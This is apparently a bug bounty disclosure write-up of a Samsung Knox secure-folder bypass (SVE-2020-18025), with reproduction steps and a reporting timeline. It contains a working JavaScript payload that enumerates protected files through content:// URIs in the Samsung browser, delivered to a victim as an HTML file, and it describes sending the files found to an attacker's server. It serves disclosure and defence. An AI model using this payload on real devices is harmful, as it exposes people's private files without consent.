Bypass Samsung Knox protection to read files stored in a secure folder | Android

Description: Samsung Knox is a defensive mobile security platform that is built into Samsung devices and enhances security in all directions through a combination of physical means and software systems, providing security protection from the hardware to the application layer.

I used the path and file structure to bypass Samsung Knox protection in an unauthorized manner to read the stored files in the secure folder, and received a Samsung $3750 reward.

Severity: High | SVE-2020-18025

Vulnerability introduction

Normally, Samsung’s multi-user storage environment (MULTI-USER STORAGE) uses the secure folder APP to reinforce confidential files, and the content provider (Content Provider) does not have the right to access the files. Therefore, it cannot be accessed with a browser or APP. Related files in a multi-user storage environment.

The vulnerability lies in that when the secure folder is locked, the content URL link can be used to access these secure files through the Samsung browser. To access a specific file in a multi-user storage environment, you need to add a corresponding file number to the content URL link. Therefore, you can use a javascript script to enumerate all files in the multi-user storage environment.


Vulnerability Reproduction:

  • 1. Obtain user information in a multi-user storage environment:
adb shell pm list users

Then you will get the following information:

UserInfo{0:rahul:1} running

UserInfo{150:Secure Folder: } running
  • 2. Construct the following content URL links to access the corresponding files:

content://150@media/external/file/file_number

  • 3. Based on the this vulnerability, construct the following html code file to enumerate the files in the storage:
<script>
    var scriptElement = document.createElement("script");
var i = 0;

function next() {
    scriptElement.onerror = function() {
        i++;
        document.write('Finding');
        next();
    };
    scriptElement.onload = function() {
        foundIt();
    };
    scriptElement.src = "content://150@media/external/file/" + i;
    document.body.appendChild(scriptElement);
}

function foundIt() {
    alert(scriptElement.src);
}; </script> 

  • 4. In order to verify the vulnerability and reduce the attack steps, here the html file is sent to the victim via Whatsapp;
  • 5. When the victim opens the html file in the Samsung browser, the file will perform file enumeration. If a valid file is found, the corresponding content URL link path will be displayed (technically speaking, it can also be in the html Set the response in the file so that the attacker can get it);
  • 6. In the same way, if you open the content URL link obtained above in the Samsung browser, such as content://150@media/external/file/1002, the specific security file can be displayed, and then it can be sent to via xhr request In the server controlled by the attacker.
  • Proof of concept:


  • Timeline:
  • 12/06/2020 : Issue reported

    15/06/2020: Security analyst assigned

    24/07/2020: We needed an additional time to review the issue with our internal stakeholders.

    14/08/2020: We confirmed the vulnerability from your finding and concluded the severity of the vulnerability is High.

    15/09/2020: Bounty rewarded $3750

    05/10/2020: SVE-2020-18025,  We completed our security update and the reward process, as applicable. So, we are now closing this issue., CVE requested

    Thank you